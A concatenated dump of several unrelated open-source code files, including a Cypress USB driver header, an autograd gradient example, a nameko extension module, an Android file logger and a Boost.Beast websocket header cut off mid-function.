* Function Name: Cy_USBFS_Dev_Drv_GetArbWriteAddr
****************************************************************************//**
*
* Returns write address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Write address in the hardware buffer for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbWriteAddr(USBFS_Type const *base, uint32_t endpoint)
{
return (USBFS_DEV_ARB_RW_WA16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbReadAddr
****************************************************************************//**
*
* Returns read address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Read address in the hardware buffer for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbReadAddr(USBFS_Type const *base, uint32_t endpoint)
{
return (USBFS_DEV_ARB_RW_RA16(base, endpoint));
}
/** \} group_usbfs_drv_drv_reg_arbiter */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter_data
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteData
****************************************************************************//**
*
* Writes a byte (8-bit) into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param byte
* The byte of data to be written into the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData(USBFS_Type *base, uint32_t endpoint, uint8_t byte)
{
USBFS_DEV_ARB_RW_DR(base, endpoint) = (uint32_t) byte;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteData16
****************************************************************************//**
*
* Writes a half-word (16-bit) into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param halfword
* The half-word of data to be written into the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData16(USBFS_Type *base, uint32_t endpoint, uint16_t halfword)
{
USBFS_DEV_ARB_RW_DR16(base, endpoint) = (uint32_t) halfword;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadData
****************************************************************************//**
*
* Reads a byte (8-bit) from the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The byte of data to be read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint8_t Cy_USBFS_Dev_Drv_ReadData(USBFS_Type const *base, uint32_t endpoint)
{
return ((uint8_t) USBFS_DEV_ARB_RW_DR(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadData16
****************************************************************************//**
*
* Reads a half-word (16-bit) from the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The half-word of data to be read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint16_t Cy_USBFS_Dev_Drv_ReadData16(USBFS_Type const *base, uint32_t endpoint)
{
return ((uint16_t) USBFS_DEV_ARB_RW_DR16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetDataRegAddr
****************************************************************************//**
*
* Returns pointer to the 8-bit data register for the specified endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The pointer to the 8-bit data register for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataRegAddr(USBFS_Type *base, uint32_t endpoint)
{
return (&USBFS_DEV_ARB_RW_DR(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetDataReg16Addr
****************************************************************************//**
*
* Returns pointer to the 16-bit data register for the specified endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range (0 - \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1).
*
* \return
* The pointer to the 16-bit data register for the specified endpoint.
*
*******************************************************************************/
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataReg16Addr(USBFS_Type *base, uint32_t endpoint)
{
return (&USBFS_DEV_ARB_RW_DR16(base, endpoint));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_FlushInBuffer
****************************************************************************//**
*
* Flushes IN endpoint buffer: sets WA pointer (controlled by CPU/DMA) to equal
* RA (controlled by SIE; gets automatically reset on transfer completion).
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_FlushInBuffer(USBFS_Type *base, uint32_t endpoint)
{
Cy_USBFS_Dev_Drv_SetArbWriteAddr(base, endpoint,
Cy_USBFS_Dev_Drv_GetArbReadAddr(base, endpoint));
}
/** \} group_usbfs_drv_drv_reg_arbiter_data */
/**
* \addtogroup group_usbfs_drv_drv_reg_misc
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetEpType
****************************************************************************//**
*
* Sets the data endpoint direction.
*
* \param base
* The pointer to the USBFS instance.
*
* \param inDirection
* Defines whether endpoint direction is IN (true) or OUT (false).
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEpType(USBFS_Type *base, bool inDirection, uint32_t endpoint)
{
uint32_t mask = (uint32_t) (0x1UL << endpoint);
uint32_t regValue = CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP_TYPE(base));
if (inDirection)
{
/* IN direction: clear bit */
regValue &= ~mask;
}
else
{
/* OUT direction: set bit */
regValue |= mask;
}
USBFS_DEV_EP_TYPE(base) = CY_USBFS_DEV_DRV_WRITE_ODD(regValue);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSofNubmer
****************************************************************************//**
*
* Returns the SOF frame number.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The SOF frame number.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSofNubmer(USBFS_Type const *base)
{
return _FLD2VAL(USBFS_USBDEV_SOF16_FRAME_NUMBER16, USBFS_DEV_SOF16(base));
}
/** \} group_usbfs_drv_drv_reg_misc */
#if defined(__cplusplus)
}
#endif
#endif /* CY_IP_MXUSBFS */
#endif /* (CY_USBFS_DEV_DRV_REG_H) */
/** \endcond */
/* [] END OF FILE */
| 18,682
|
6,119
|
"""This example shows how to define the gradient of your own functions.
This can be useful for speed, numerical stability, or in cases where
your code depends on external library calls."""
from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd import grad
from autograd.extend import primitive, defvjp
from autograd.test_util import check_grads
# @primitive tells Autograd not to look inside this function, but instead
# to treat it as a black box, whose gradient might be specified later.
# Functions with this decorator can contain anything that Python knows
# how to execute, and you can do things like in-place operations on arrays.
@primitive
def logsumexp(x):
"""Numerically stable log(sum(exp(x))), also defined in scipy.special"""
max_x = np.max(x)
return max_x + np.log(np.sum(np.exp(x - max_x)))
# Next, we write a function that specifies the gradient with a closure.
# The reason for the closure is so that the gradient can depend
# on both the input to the original function (x), and the output of the
# original function (ans).
def logsumexp_vjp(ans, x):
# If you want to be able to take higher-order derivatives, then all the
# code inside this function must be itself differentiable by Autograd.
# This closure multiplies g with the Jacobian of logsumexp (d_ans/d_x).
# Because Autograd uses reverse-mode differentiation, g contains
# the gradient of the objective w.r.t. ans, the output of logsumexp.
# This returned VJP function doesn't close over `x`, so Python can
# garbage-collect `x` if there are no references to it elsewhere.
x_shape = x.shape
return lambda g: np.full(x_shape, g) * np.exp(x - np.full(x_shape, ans))
# Now we tell Autograd that logsumexmp has a gradient-making function.
defvjp(logsumexp, logsumexp_vjp)
if __name__ == '__main__':
# Now we can use logsumexp() inside a larger function that we want
# to differentiate.
def example_func(y):
z = y**2
lse = logsumexp(z)
return np.sum(lse)
grad_of_example = grad(example_func)
print("Gradient: \n", grad_of_example(npr.randn(10)))
# Check the gradients numerically, just to be safe.
check_grads(example_func, modes=['rev'])(npr.randn(10))
| 750
|
5,169
|
{
"name": "EasyIAPs",
"version": "0.1.2",
"platforms": {
"ios": "9.0"
},
"license": "MIT",
"summary": "Helping you to manage your In App Purchases easily.",
"homepage": "https://github.com/alvinvarghese/EasyIAPs",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/alvinvarghese/EasyIAPs.git",
"tag": "0.1.2"
},
"description": "This library provides a an easy way to manage In App Purchases in your iOS app",
"frameworks": [
"UIKit",
"Foundation",
"StoreKit",
"QuartzCore"
],
"social_media_url": "https://twitter.com/aalvinv",
"source_files": "EasyIAPs/**/*.{swift}",
"dependencies": {
"SVProgressHUD": [
]
}
}
| 306
|
1,220
|
<filename>appshared/src/main/java/io/reark/rxgithubapp/shared/data/DataLayerBase.java
/*
* The MIT License
*
* Copyright (c) 2013-2016 reark project contributors
*
* https://github.com/reark/reark/graphs/contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package io.reark.rxgithubapp.shared.data;
import android.support.annotation.NonNull;
import io.reark.reark.data.stores.interfaces.StoreInterface;
import io.reark.reark.pojo.NetworkRequestStatus;
import io.reark.rxgithubapp.shared.pojo.GitHubRepository;
import io.reark.rxgithubapp.shared.pojo.GitHubRepositorySearch;
import static io.reark.reark.utils.Preconditions.get;
public abstract class DataLayerBase {
@NonNull
protected final StoreInterface<Integer, NetworkRequestStatus, NetworkRequestStatus> networkRequestStatusStore;
@NonNull
protected final StoreInterface<Integer, GitHubRepository, GitHubRepository> gitHubRepositoryStore;
@NonNull
protected final StoreInterface<String, GitHubRepositorySearch, GitHubRepositorySearch> gitHubRepositorySearchStore;
protected DataLayerBase(@NonNull final StoreInterface<Integer, NetworkRequestStatus, NetworkRequestStatus> networkRequestStatusStore,
@NonNull final StoreInterface<Integer, GitHubRepository, GitHubRepository> gitHubRepositoryStore,
@NonNull final StoreInterface<String, GitHubRepositorySearch, GitHubRepositorySearch> gitHubRepositorySearchStore) {
this.networkRequestStatusStore = get(networkRequestStatusStore);
this.gitHubRepositoryStore = get(gitHubRepositoryStore);
this.gitHubRepositorySearchStore = get(gitHubRepositorySearchStore);
}
}
| 803
|
609
|
<gh_stars>100-1000
#ifndef ____IPV4_H
#define ____IPV4_H
//ipv4.h
#endif
| 63
|
345
|
<reponame>xreminded/FakeGps3
package tiger.radio.loggerlibrary;
import android.support.v4.app.FragmentTransaction;
import android.util.Log;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.util.logging.FileHandler;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
public class LogFile {
private static final boolean LOGV = true;
public static final int LOG_FILE_MAX_SIZE = 2 * 1024 * 1024;
public static final int LOG_FILE_MAX_COUNT = 10;
private File mLogDir;
private String mLogFileName;
private LogRecord mLogRecord = new LogRecord(Level.INFO, "");
private Logger mLogger;
public LogFile(String name, File dir, String fileName) {
if (dir == null || !dir.exists() || fileName == null) {
Log.w("LogFile", "Invalid configuration provided");
throw new IllegalArgumentException();
}
this.mLogDir = dir;
this.mLogFileName = fileName;
File path = new File(this.mLogDir, this.mLogFileName);
this.mLogger = Logger.getLogger(name);
try {
Handler handler = new FileHandler(path.getAbsolutePath(), LOG_FILE_MAX_SIZE, LOG_FILE_MAX_COUNT, true);
if (LOGV) {
Log.d("LogFile", "path=" + path.getAbsolutePath());
}
handler.setFormatter(new CustomFormatter());
this.mLogger.setUseParentHandlers(false);
this.mLogger.addHandler(handler);
this.mLogger.setLevel(Level.ALL);
} catch (IOException e) {
Log.e("LogFile", "Exception: ", e);
}
}
public void v(String tag, String msg) {
log(Level.FINEST, tag, msg);
}
public void v(String tag, String msg, Throwable t) {
Log.v(tag, msg, t);
log(Level.FINEST, tag, msg, t);
}
public void d(String tag, String msg) {
log(Level.FINE, tag, msg);
}
public void d(String tag, String msg, Throwable t) {
log(Level.FINE, tag, msg, t);
}
public void i(String tag, String msg) {
log(Level.INFO, tag, msg);
}
public void i(String tag, String msg, Throwable t) {
log(Level.INFO, tag, msg, t);
}
public void w(String tag, String msg) {
log(Level.WARNING, tag, msg);
}
public void w(String tag, String msg, Throwable t) {
log(Level.WARNING, tag, msg, t);
}
public void e(String tag, String msg) {
log(Level.SEVERE, tag, msg);
}
public void e(String tag, String msg, Throwable t) {
log(Level.SEVERE, tag, msg, t);
}
public void wtf(String tag, String msg) {
log(Level.SEVERE, tag, msg);
}
public void wtf(String tag, String msg, Throwable t) {
log(Level.SEVERE, tag, msg, t);
}
public void f(String tag, String msg) {
log(Level.INFO, tag, msg);
}
public void f(String tag, String msg, Throwable t) {
log(Level.INFO, tag, msg, t);
}
private synchronized void log(Level level, String tag, String msg) {
if (this.mLogger == null) {
Log.w("LogFile", "File logger not configured");
} else {
this.mLogRecord.setMillis(System.currentTimeMillis());
this.mLogRecord.setLevel(level);
this.mLogRecord.setMessage(String.format("%s: %s", tag, msg));
this.mLogRecord.setThrown(null);
this.mLogger.log(this.mLogRecord);
}
}
private synchronized void log(Level level, String tag, String msg, Throwable t) {
if (this.mLogger == null) {
Log.w("LogFile", "File logger not configured");
} else {
this.mLogRecord.setMillis(System.currentTimeMillis());
this.mLogRecord.setLevel(level);
this.mLogRecord.setMessage(String.format("%s: %s", tag, msg));
this.mLogRecord.setThrown(t);
this.mLogger.log(this.mLogRecord);
}
}
public synchronized void dump(PrintWriter writer) {
if (this.mLogDir == null || this.mLogFileName == null) {
Log.w("LogFile", "The file or directory of the log file is unknown");
} else {
for (int i = 0; i < 2; i++) {
File f = new File(this.mLogDir, this.mLogFileName + "." + i);
if (f.exists()) {
dumpLogFile(f, writer);
}
}
}
}
private void dumpLogFile(File file, PrintWriter writer) {
IOException e;
InputStreamReader reader = null;
writer.println();
writer.println(file.getName() + ":");
writer.println();
try {
InputStreamReader reader2 = new FileReader(file);
try {
char[] buf = new char[FragmentTransaction.TRANSIT_EXIT_MASK];
while (true) {
int ret = reader2.read(buf);
if (ret == -1) {
IOUtils.closeQuietly(reader2);
reader = reader2;
return;
}
writer.write(buf, 0, ret);
}
} catch (IOException e2) {
e = e2;
reader = reader2;
} catch (Throwable th2) {
reader = reader2;
}
} catch (IOException e3) {
e = e3;
try {
Log.w("LogFile", "Exception: ", e);
IOUtils.closeQuietly(reader);
} catch (Throwable th3) {
IOUtils.closeQuietly(reader);
}
}
}
}
| 2,738
|
1,936
|
#ifndef POSEGRAPH_EXAMPLE_VERTEX_H_
#define POSEGRAPH_EXAMPLE_VERTEX_H_
#include <unordered_set>
#include <maplab-common/pose_types.h>
#include <posegraph/vertex.h>
namespace pose_graph {
namespace example {
class Vertex : public pose_graph::Vertex {
public:
explicit Vertex(const VertexId& id);
virtual ~Vertex();
virtual const VertexId& id() const;
virtual bool addIncomingEdge(const EdgeId& edge);
virtual bool addOutgoingEdge(const EdgeId& edge);
virtual void getOutgoingEdges(std::unordered_set<EdgeId>* edges) const;
virtual void getIncomingEdges(std::unordered_set<EdgeId>* edges) const;
virtual bool hasIncomingEdges() const;
virtual bool hasOutgoingEdges() const;
EIGEN_MAKE_ALIGNED_OPERATOR_NEW
private:
virtual void removeIncomingEdge(const pose_graph::EdgeId& edge_id);
virtual void removeOutgoingEdge(const pose_graph::EdgeId& edge_id);
VertexId id_;
std::unordered_set<EdgeId> incoming_;
std::unordered_set<EdgeId> outgoing_;
};
} // namespace example
} // namespace pose_graph
#endif // POSEGRAPH_EXAMPLE_VERTEX_H_
| 378
|
430
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Dict
from pandas import DataFrame, concat
from lib.cast import safe_int_cast
from lib.data_source import DataSource
from lib.utils import table_rename
from pipelines.epidemiology.de_authority import _SUBREGION1_CODE_MAP
_column_adapter = {
"Date": "date",
"RS": "subregion1_code",
"New number vaccinated at least once": "new_persons_vaccinated",
"New Fully Vaccinated": "new_persons_fully_vaccinated",
"New Vaccinations": "new_vaccine_doses_administered",
"Total number vaccinated at least once": "total_persons_vaccinated",
"Total Fully Vaccinated": "total_persons_fully_vaccinated",
"Total Vaccinations": "total_vaccine_doses_administered",
"Total First Dose BioNTech": "new_persons_vaccinated_pfizer",
"Total Second Dose BioNTech": "total_persons_fully_vaccinated_pfizer",
"Total First Dose Moderna": "new_persons_vaccinated_moderna",
"Total Second Dose Moderna": "total_persons_fully_vaccinated_moderna",
"Total First Dose AstraZeneca": "new_persons_vaccinated_astrazeneca",
"Total Second Dose AstraZeneca": "total_persons_fully_vaccinated_astrazeneca",
"Total First Dose Janssen": "new_persons_vaccinated_janssen",
"Total Second Dose Janssen": "total_persons_fully_vaccinated_janssen",
}
class FinMangoGermanyDataSource(DataSource):
def parse_dataframes(
self, dataframes: Dict[Any, DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
data = table_rename(concat(dataframes[0].values()), _column_adapter, drop=True)
# Remove records with no date or location
data = data.dropna(subset=["date", "subregion1_code"])
# Convert data to int type
for col in data.columns[2:]:
data[col] = data[col].apply(safe_int_cast)
# Use proper ISO codes for the subregion1 level
data["subregion1_code"] = data["subregion1_code"].apply(_SUBREGION1_CODE_MAP.get)
# Blank region code is used for country-level data
data["key"] = None
data.loc[data["subregion1_code"].isna(), "key"] = "DE"
data.loc[data["subregion1_code"].notna(), "key"] = "DE_" + data["subregion1_code"]
return data
| 984
|
3,425
|
from __future__ import absolute_import
import inspect
import types
import warnings
import weakref
from functools import partial
from logging import getLogger
from eventlet.event import Event
from nameko.exceptions import IncorrectSignature
_log = getLogger(__name__)
ENTRYPOINT_EXTENSIONS_ATTR = 'nameko_entrypoints'
class Extension(object):
""" Note that Extension.__init__ is called during :meth:`bind` as
well as at instantiation time, so avoid side-effects in this method.
Use :meth:`setup` instead.
Furthermore, :meth:`bind` and :func:`iter_extensions` use introspection
to find any subextensions that an extension may declare. Any descriptors
on the extension should expect to be called during introspection, which
happens between `ServiceContainer.__init__` and `ServiceContainer.setup`.
:attr:`Extension.container` gives access to the
:class:`~nameko.containers.ServiceContainer` instance to
which the Extension is bound, otherwise `None`.
"""
__params = None
container = None
def __new__(cls, *args, **kwargs):
inst = super(Extension, cls).__new__(cls)
inst.__params = (args, kwargs)
return inst
def setup(self):
""" Called on bound Extensions before the container starts.
Extensions should do any required initialisation here.
"""
def start(self):
""" Called on bound Extensions when the container has successfully
started.
This is only called after all other Extensions have successfully
returned from :meth:`Extension.setup`. If the Extension reacts
to external events, it should now start acting upon them.
"""
def stop(self):
""" Called when the service container begins to shut down.
Extensions should do any graceful shutdown here.
"""
def kill(self):
""" Called to stop this extension without grace.
Extensions should urgently shut down here. This means
stopping as soon as possible by omitting cleanup.
This may be distinct from ``stop()`` for certain dependencies.
For example, :class:`~messaging.QueueConsumer` tracks messages being
processed and pending message acks. Its ``kill`` implementation
discards these and disconnects from rabbit as soon as possible.
Extensions should not raise during kill, since the container
is already dying. Instead they should log what is appropriate and
swallow the exception to allow the container kill to continue.
"""
def bind(self, container):
""" Get an instance of this Extension to bind to `container`.
"""
def clone(prototype):
if prototype.is_bound():
raise RuntimeError('Cannot `bind` a bound extension.')
cls = type(prototype)
args, kwargs = prototype.__params
instance = cls(*args, **kwargs)
# instance.container must be a weakref to avoid a strong reference
# from value to key in the `shared_extensions` weakkey dict
# see test_extension_sharing.py: test_weakref
instance.container = weakref.proxy(container)
return instance
instance = clone(self)
# recurse over sub-extensions
for name, ext in inspect.getmembers(self, is_extension):
setattr(instance, name, ext.bind(container))
return instance
def is_bound(self):
return self.container is not None
def __repr__(self):
if not self.is_bound():
return '<{} [unbound] at 0x{:x}>'.format(
type(self).__name__, id(self))
return '<{} at 0x{:x}>'.format(
type(self).__name__, id(self))
class SharedExtension(Extension):
@property
def sharing_key(self):
return type(self)
def bind(self, container):
""" Bind implementation that supports sharing.
"""
# if there's already a matching bound instance, return that
shared = container.shared_extensions.get(self.sharing_key)
if shared:
return shared
instance = super(SharedExtension, self).bind(container)
# save the new instance
container.shared_extensions[self.sharing_key] = instance
return instance
class DependencyProvider(Extension):
attr_name = None
def bind(self, container, attr_name):
""" Get an instance of this Dependency to bind to `container` with
`attr_name`.
"""
instance = super(DependencyProvider, self).bind(container)
instance.attr_name = attr_name
self.attr_name = attr_name
return instance
def get_dependency(self, worker_ctx):
""" Called before worker execution. A DependencyProvider should return
an object to be injected into the worker instance by the container.
"""
def worker_result(self, worker_ctx, result=None, exc_info=None):
""" Called with the result of a service worker execution.
Dependencies that need to process the result should do it here.
This method is called for all `Dependency` instances on completion
of any worker.
Example: a database session dependency may flush the transaction
:Parameters:
worker_ctx : WorkerContext
See ``nameko.containers.ServiceContainer.spawn_worker``
"""
def worker_setup(self, worker_ctx):
""" Called before a service worker executes a task.
Dependencies should do any pre-processing here, raising exceptions
in the event of failure.
Example: ...
:Parameters:
worker_ctx : WorkerContext
See ``nameko.containers.ServiceContainer.spawn_worker``
"""
def worker_teardown(self, worker_ctx):
""" Called after a service worker has executed a task.
Dependencies should do any post-processing here, raising
exceptions in the event of failure.
Example: a database session dependency may commit the session
:Parameters:
worker_ctx : WorkerContext
See ``nameko.containers.ServiceContainer.spawn_worker``
"""
def __repr__(self):
if not self.is_bound():
return '<{} [unbound] at 0x{:x}>'.format(
type(self).__name__, id(self))
service_name = self.container.service_name
return '<{} [{}.{}] at 0x{:x}>'.format(
type(self).__name__, service_name, self.attr_name, id(self))
class ProviderCollector(object):
def __init__(self, *args, **kwargs):
self._providers = set()
self._providers_registered = False
self._last_provider_unregistered = Event()
super(ProviderCollector, self).__init__(*args, **kwargs)
def register_provider(self, provider):
self._providers_registered = True
_log.debug('registering provider %s for %s', provider, self)
self._providers.add(provider)
def unregister_provider(self, provider):
providers = self._providers
if provider not in self._providers:
return
_log.debug('unregistering provider %s for %s', provider, self)
providers.remove(provider)
if len(providers) == 0:
_log.debug('last provider unregistered for %s', self)
self._last_provider_unregistered.send()
def wait_for_providers(self):
""" Wait for any providers registered with the collector to have
unregistered.
Returns immediately if no providers were ever registered.
"""
if self._providers_registered:
_log.debug('waiting for providers to unregister %s', self)
self._last_provider_unregistered.wait()
_log.debug('all providers unregistered %s', self)
def stop(self):
""" Default `:meth:Extension.stop()` implementation for
subclasses using `ProviderCollector` as a mixin.
"""
self.wait_for_providers()
def register_entrypoint(fn, entrypoint):
descriptors = getattr(fn, ENTRYPOINT_EXTENSIONS_ATTR, None)
if descriptors is None:
descriptors = set()
setattr(fn, ENTRYPOINT_EXTENSIONS_ATTR, descriptors)
descriptors.add(entrypoint)
class Entrypoint(Extension):
method_name = None
def __init__(
self, expected_exceptions=(), sensitive_arguments=(), **kwargs
):
"""
:Parameters:
expected_exceptions : exception class or tuple of exception classes
Specify exceptions that may be caused by the caller (e.g. by
providing bad arguments). Saved on the entrypoint instance as
``entrypoint.expected_exceptions`` for later inspection by
other extensions, for example a monitoring system.
sensitive_arguments : string or tuple of strings
Mark an argument or part of an argument as sensitive. Saved on
the entrypoint instance as ``entrypoint.sensitive_arguments``
for later inspection by other extensions, for example a
logging system.
:seealso: :func:`nameko.utils.get_redacted_args`
"""
# backwards compat
sensitive_variables = kwargs.pop('sensitive_variables', ())
if sensitive_variables:
sensitive_arguments = sensitive_variables
warnings.warn(
"The `sensitive_variables` argument has been renamed to "
"`sensitive_arguments`. This warning will be removed in "
"version 2.9.0.", DeprecationWarning)
self.expected_exceptions = expected_exceptions
self.sensitive_arguments = sensitive_arguments
super(Entrypoint, self).__init__(**kwargs)
def bind(self, container, method_name):
""" Get an instance of this Entrypoint to bind to `container` with
`method_name`.
"""
instance = super(Entrypoint, self).bind(container)
instance.method_name = method_name
return instance
def check_signature(self, args, kwargs):
service_cls = self.container.service_cls
fn = getattr(service_cls, self.method_name)
try:
service_instance = None # fn is unbound
inspect.getcallargs(fn, service_instance, *args, **kwargs)
except TypeError as exc:
raise IncorrectSignature(str(exc))
@classmethod
def decorator(cls, *args, **kwargs):
def registering_decorator(fn, args, kwargs):
instance = cls(*args, **kwargs)
register_entrypoint(fn, instance)
return fn
if len(args) == 1 and isinstance(args[0], types.FunctionType):
# usage without arguments to the decorator:
# @foobar
# def spam():
# pass
return registering_decorator(args[0], args=(), kwargs={})
else:
# usage with arguments to the decorator:
# @foobar('shrub', ...)
# def spam():
# pass
return partial(registering_decorator, args=args, kwargs=kwargs)
def __repr__(self):
if not self.is_bound():
return '<{} [unbound] at 0x{:x}>'.format(
type(self).__name__, id(self))
service_name = self.container.service_name
return '<{} [{}.{}] at 0x{:x}>'.format(
type(self).__name__, service_name, self.method_name, id(self))
def is_extension(obj):
return isinstance(obj, Extension)
def is_dependency(obj):
return isinstance(obj, DependencyProvider)
def is_entrypoint(obj):
return isinstance(obj, Entrypoint)
def iter_extensions(extension):
""" Depth-first iterator over sub-extensions on `extension`.
"""
for _, ext in inspect.getmembers(extension, is_extension):
for item in iter_extensions(ext):
yield item
yield ext
| 4,725
|
995
|
//
// Copyright (c) 2016-2019 <NAME> (<EMAIL> at <EMAIL> dot <EMAIL>)
//
// Distributed under the Boost Software License, Version 1.0. (See accompanying
// file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// Official repository: https://github.com/boostorg/beast
//
#ifndef BOOST_BEAST_WEBSOCKET_DETAIL_IMPL_BASE_HPP
#define BOOST_BEAST_WEBSOCKET_DETAIL_IMPL_BASE_HPP
#include <boost/beast/websocket/option.hpp>
#include <boost/beast/websocket/detail/frame.hpp>
#include <boost/beast/websocket/detail/pmd_extension.hpp>
#include <boost/beast/core/buffer_traits.hpp>
#include <boost/beast/core/role.hpp>
#include <boost/beast/http/empty_body.hpp>
#include <boost/beast/http/message.hpp>
#include <boost/beast/http/string_body.hpp>
#include <boost/beast/zlib/deflate_stream.hpp>
#include <boost/beast/zlib/inflate_stream.hpp>
#include <boost/beast/core/buffers_suffix.hpp>
#include <boost/beast/core/error.hpp>
#include <boost/beast/core/detail/clamp.hpp>
#include <boost/asio/buffer.hpp>
#include <cstdint>
#include <memory>
#include <stdexcept>
namespace boost {
namespace beast {
namespace websocket {
namespace detail {
//------------------------------------------------------------------------------
template<bool deflateSupported>
struct impl_base;
template<>
struct impl_base<true>
{
// State information for the permessage-deflate extension
struct pmd_type
{
// `true` if current read message is compressed
bool rd_set = false;
zlib::deflate_stream zo;
zlib::inflate_stream zi;
};
std::unique_ptr<pmd_type> pmd_; // pmd settings or nullptr
permessage_deflate pmd_opts_; // local pmd options
detail::pmd_offer pmd_config_; // offer (client) or negotiation (server)
// return `true` if current message is deflated
bool
rd_deflated() const
{
return pmd_ && pmd_->rd_set;
}
// set whether current message is deflated
// returns `false` on protocol violation
bool
rd_deflated(bool rsv1)
{
if(pmd_)
{
pmd_->rd_set = rsv1;
return true;
}
return ! rsv1; // pmd not negotiated
}
// Compress a buffer sequence
// Returns: `true` if more calls are needed
//
template<class ConstBufferSequence>
bool
deflate(
net::mutable_buffer& out,
buffers_suffix<ConstBufferSequence>& cb,
bool fin,
std::size_t& total_in,
error_code& ec)
{
BOOST_ASSERT(out.size() >= 6);
auto& zo = this->pmd_->zo;
zlib::z_params zs;
zs.avail_in = 0;
zs.next_in = nullptr;
zs.avail_out = out.size();
zs.next_out = out.data();
